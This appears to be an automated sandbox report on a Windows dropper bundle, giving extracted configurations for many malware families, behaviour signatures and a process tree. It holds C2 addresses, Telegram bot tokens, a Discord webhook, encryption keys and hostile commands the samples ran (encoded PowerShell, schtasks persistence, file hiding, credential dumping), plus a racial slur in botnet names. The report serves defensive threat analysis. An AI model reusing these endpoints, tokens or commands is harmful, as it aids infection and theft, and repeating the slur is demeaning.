amadey | 07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a

Analysis

max time kernel
1s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 02:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
Size

74.9MB
MD5

c7043b9b65e252b5305634da4f5515f1
SHA1

129a58d2c6c4de7fcead562f9729a28e517fb6d4
SHA256

07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a
SHA512

cdc28eb03dcf533d19e74d7bd86962905486902c5556c448bbf0daa69be705dc1f18c7ea2c41ba8568a1910efb711edaa259a02d35108474e412b8044b719575
SSDEEP

1572864:Z6x3bF0F9U7b7ewHkli+ouzl1IBMrGZHdk/6eSDFb:UBF0Fsb7ewHkliN4km+91xb

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

sharpstealer

https://api.telegram.org/bot7057429288:AAHYl5_27YU1Yjmuj33WKOqLVSgYtq3n-8k/getUpdates

Extracted

Family

quasar

Version

1.3.0.0

Botnet

nigga

niggahunter-28633.portmap.io:28633

Mutex

QSR_MUTEX_m0fef2zik6JZzavCsv

Attributes

encryption_key
E3KUWr7JQZqCWN4hstks
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

lumma

https://t5impactsupport.world/api

https://nestlecompany.world/api

https://mercharena.biz/api

https://stormlegue.com/api

https://blast-hubs.com/api

https://blastikcn.com/api

https://lestagames.world/api

Extracted

Family

asyncrat

Version

0.5.6B

Botnet

null

rootedkrypto-29674.portmap.host:29674

Mutex

jsmjjhooulqefd

Attributes

delay
5
install
true
install_file
Minecraft.exe
install_folder
%AppData%

aes.plain

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

dropout-37757.portmap.host:55554

dropout-37757.portmap.host:37757

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

silverrat

Version

1.0.0.0

clear-spice.gl.at.ply.gg:62042

Mutex

SilverMutex_ZtRAjMMKxS

Attributes

certificate
MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==
decrypted_key
-|S.S.S|-
discord
https://discord.com/api/webhooks/1335733715820609557/QV6ZUiJPFo3MXmoiKBB-WTBlkHeBiFxmRY95RN_M1sHhPMswAoo2T6AL_kHvoSoCRKE0
key
yy6zDjAUmbB09pKvo5Hhug==
key_x509
dFRzdEVvbU9ZVUR2UmVzZFlPR3V3dlRGWURZdk9S
payload_url
https://g.top4top.io/p_2522c7w8u1.png
reconnect_delay
2
server_signature
PtC8aQAwsdmyktc6Q/l3u9a8oFTj+Ey3VIlIKXe9bX2WiEn7hNPQ0tkMLi1qQ4IBmCWOFTRIVHi2GG5zTxUlAwkitK3X3bWdHiwrf6PqZ7NdmPsSKZym4q+nKXH4df40wtjNvJ2x2m8OSi5jsVvT64/UsmRfIZbFTRp63PCTQ6lN+EL6OoW+dMidok+JH6T8pG21/HyoeykN9muipEqdoixkTFitX6aUocvGy6VZCs7eSxoXtzmYQ3tBukBHuIZAivbVLiF2aDkkpSX6763SGMYUbfASkQ/ihv1elb+XOoqprP3V4GqcllwfGzlk+8/rQD8C3cwLiQEtXgKHbyYWrNcSvis5fYgRcEDvlk2ZkbE8VQE6aNc+VN0TZNW3ldvE+h62kKCYoOb7oJDwiw86IudT01xe9YetmDuCvOIBZqGoXj0h68jOIklH4g22Fx8pOaIisv01vdSoawFzoOQNfgfZeRgjvV6QJHQiYuodn+FWlPwYxQ7FzUJy3is8d0VoJr6rG2BeEn99pW/LO+SsCfPIGZvs7oA/oEsn2BBkGVhlko0IZCxd30q3HIEIwdagGJgHVtnC5C2yMsmjV3geQMUCdRsAJEuCEVqAkTr7QQNJoSCok8jOYoOeJxzwbNzAMySliCDNoGYhhU/jnfhJKsqo355RYtvKROehEYZ0Srg=

Extracted

Family

lokibot

https://rottot.shop/Devil/PWS/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

xworm

Version

5.0

142.147.96.74:7000

buinhatduy01.ddns.net:7000

buinhatduy.duckdns.org:7000

Mutex

GrvSx1c72DJvLvKa

Attributes

Install_directory
%AppData%
install_file
AggregatorHost.exe

aes.plain

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

https://api.telegram.org/bot7668501460:AAH2A5oRhWUqF_EWSrJaaRppA9RgQdU2iUc/sendDocument

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral2/files/0x00070000000242b3-736.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral2/files/0x0008000000024273-2075.dat	family_xworm
behavioral2/memory/7644-2084-0x00000000001D0000-0x00000000001E6000-memory.dmp	family_xworm
behavioral2/files/0x000800000002427e-2150.dat	family_xworm
behavioral2/memory/7428-2202-0x0000000000930000-0x0000000000940000-memory.dmp	family_xworm

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0007000000024222-245.dat	family_quasar
behavioral2/memory/6000-261-0x0000000000700000-0x000000000075E000-memory.dmp	family_quasar
behavioral2/files/0x000800000001680e-26635.dat	family_quasar

Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
Sality family
sality
Sharp Stealer
Sharp Stealer is an infostealer first observed in 2024, based on Echelon and Umbral stealers.
stealer sharpstealer
Sharpstealer family
sharpstealer
SilverRat
SilverRat is trojan written in C#.
trojan silverrat
Silverrat family
silverrat

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x0009000000024269-3110.dat	family_xmrig
behavioral2/files/0x0009000000024269-3110.dat	xmrig

Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/files/0x0007000000024234-399.dat	family_asyncrat
behavioral2/files/0x000a00000002429c-3328.dat	family_asyncrat

ModiLoader First Stage 1 IoCs

resource	yara_rule
behavioral2/files/0x000b000000024246-713.dat	modiloader_stage1

Command and Scripting Interpreter: PowerShell 1 TTPs 21 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6264	powershell.exe
6420	powershell.exe
12008	powershell.exe
10620	powershell.exe
9580	powershell.exe
11084	powershell.exe
4084	powershell.exe
9436	powershell.exe
9592	powershell.exe
10676	powershell.exe
8208	powershell.exe
9948	powershell.exe
8132	powershell.exe
7732	powershell.exe
9304	powershell.exe
11160	powershell.exe
9240	powershell.exe
7088	powershell.exe
6948	powershell.exe
9796	powershell.exe
8948	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
10696	attrib.exe
3420	attrib.exe

Uses browser remote debugging 2 TTPs 5 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
8392	chrome.exe
8284	chrome.exe
7964	chrome.exe
8268	chrome.exe
7176	chrome.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe

Executes dropped EXE 2 IoCs

pid	Process
5568	_[MyFamilyPies]Avi.exe
6084	0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/memory/2792-660-0x0000000002990000-0x00000000029A4000-memory.dmp	agile_net

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000800000002426e-2000.dat	themida
behavioral2/memory/7788-2060-0x0000000000400000-0x0000000000CF2000-memory.dmp	themida
behavioral2/memory/7788-2051-0x0000000000400000-0x0000000000CF2000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral2/memory/5376-720-0x0000000000330000-0x00000000003D2000-memory.dmp	vmprotect
behavioral2/files/0x0007000000024245-413.dat	vmprotect

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
62	raw.githubusercontent.com
200	drive.google.com
201	drive.google.com
33	discord.com
34	discord.com
35	discord.com
51	raw.githubusercontent.com
52	raw.githubusercontent.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	api.ipify.org
20	api.ipify.org
27	ip-api.com
56	whatismyipaddress.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000a00000002424c-794.dat	autoit_exe
behavioral2/files/0x000600000001da39-26670.dat	autoit_exe
behavioral2/files/0x000d00000002402f-51662.dat	autoit_exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000024209-50.dat	upx
behavioral2/memory/4492-52-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/1704-1413-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/4832-819-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/4832-1548-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/1216-533-0x0000000002280000-0x000000000330E000-memory.dmp	upx
behavioral2/memory/1216-531-0x0000000002280000-0x000000000330E000-memory.dmp	upx
behavioral2/memory/4492-184-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral2/memory/1704-171-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/files/0x000700000002420c-163.dat	upx
behavioral2/files/0x0009000000024288-2294.dat	upx
behavioral2/memory/9644-2307-0x0000000000400000-0x000000000043C000-memory.dmp	upx
behavioral2/files/0x0005000000021aee-51431.dat	upx

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
8004	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0007000000024231-333.dat	pyinstaller
behavioral2/files/0x0007000000024233-383.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 13 IoCs

pid	pid_target	Process	procid_target
3788	4584	WerFault.exe
6856	4584	WerFault.exe
3404	3400	WerFault.exe
4664	4584	WerFault.exe
1864	4584	WerFault.exe
1016	1036	WerFault.exe	145
4580	1900	WerFault.exe	123
1212	5764	WerFault.exe	118
8580	7188	WerFault.exe
9660	8472	WerFault.exe	370
13796	13560	WerFault.exe	395
3564	9644	WerFault.exe	255
6512	9072	WerFault.exe	289

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5884	PING.EXE
7228	PING.EXE
4960	PING.EXE

Delays execution with timeout.exe 6 IoCs

defense_evasion

pid	Process
6644	timeout.exe
8932	timeout.exe
7668	timeout.exe
8372	timeout.exe
1612	timeout.exe
7960	timeout.exe

Kills process with taskkill 3 IoCs

defense_evasion

pid	Process
10588	taskkill.exe
11532	taskkill.exe
9492	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4404	reg.exe
11240	reg.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
5884	PING.EXE
7228	PING.EXE
4960	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8384	schtasks.exe
11668	schtasks.exe
12248	schtasks.exe
13116	schtasks.exe
6672	schtasks.exe
6292	schtasks.exe
8632	schtasks.exe
12392	schtasks.exe
12984	schtasks.exe
10612	schtasks.exe
8960	schtasks.exe
7948	schtasks.exe
960	schtasks.exe
11240	schtasks.exe
9872	schtasks.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	5568	_[MyFamilyPies]Avi.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 3540	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	89
PID 1980 wrote to memory of 3540	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	89
PID 1980 wrote to memory of 3540	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	89
PID 1980 wrote to memory of 5568	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	91
PID 1980 wrote to memory of 5568	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	91
PID 1980 wrote to memory of 6084	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	92
PID 1980 wrote to memory of 6084	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	92
PID 1980 wrote to memory of 6084	1980	07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe	92

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
10696	attrib.exe
3420	attrib.exe

C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe
"C:\Users\Admin\AppData\Local\Temp\07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3540
- C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
  "C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5568
- - C:\Users\Admin\AppData\Roaming\Installer.exe
    "C:\Users\Admin\AppData\Roaming\Installer.exe"
    3⤵
    PID:8
- C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
  "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6084
- - C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
    "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
    3⤵
    PID:6504
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
      4⤵
      PID:4992
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
      4⤵
      PID:5320
- C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
  "C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
  2⤵
  PID:5324
- C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
  "C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
  2⤵
  PID:4492
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    PID:2320
- - C:\Users\Admin\AppData\Local\Temp\proxyt.exe
    "C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
    3⤵
    PID:1704
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
      4⤵
      PID:1632
- C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
  "C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
  2⤵
  PID:6136
- C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
  "C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
  2⤵
  PID:3888
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    PID:9692
- C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
  "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
  2⤵
  PID:3576
- C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
  "C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 152
    3⤵
    - Program crash
    PID:1864
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 140
    3⤵
    - Program crash
    PID:4664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 152
    3⤵
    - Program crash
    PID:3788
- - C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@4584
    3⤵
    PID:4664
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
      4⤵
      PID:2160
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 504
    3⤵
    - Program crash
    PID:6856
- C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
  2⤵
  PID:1916
- C:\Users\Admin\AppData\Local\Temp\2020.exe
  "C:\Users\Admin\AppData\Local\Temp\2020.exe"
  2⤵
  PID:2792
- - C:\Users\Admin\AppData\Local\Temp\2020.exe
    "C:\Users\Admin\AppData\Local\Temp\2020.exe"
    3⤵
    PID:368
- C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
  "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
  2⤵
  PID:2416
- C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
  2⤵
  PID:1356
- C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
  "C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
  2⤵
  PID:5728
- C:\Users\Admin\AppData\Local\Temp\goofy.exe
  "C:\Users\Admin\AppData\Local\Temp\goofy.exe"
  2⤵
  PID:1468
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3420
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:10696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CA4.tmp.bat""
    3⤵
    PID:7672
- C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
  "C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
  2⤵
  PID:2828
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
    3⤵
    PID:5764
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
      4⤵
      PID:3156
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
      4⤵
      PID:3512
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 960
      4⤵
      Program crash
      PID:1212
- C:\Users\Admin\AppData\Local\Temp\nigga.exe
  "C:\Users\Admin\AppData\Local\Temp\nigga.exe"
  2⤵
  PID:6000
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:6672
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    PID:6996
  - - C:\Windows\SysWOW64\schtasks.exe
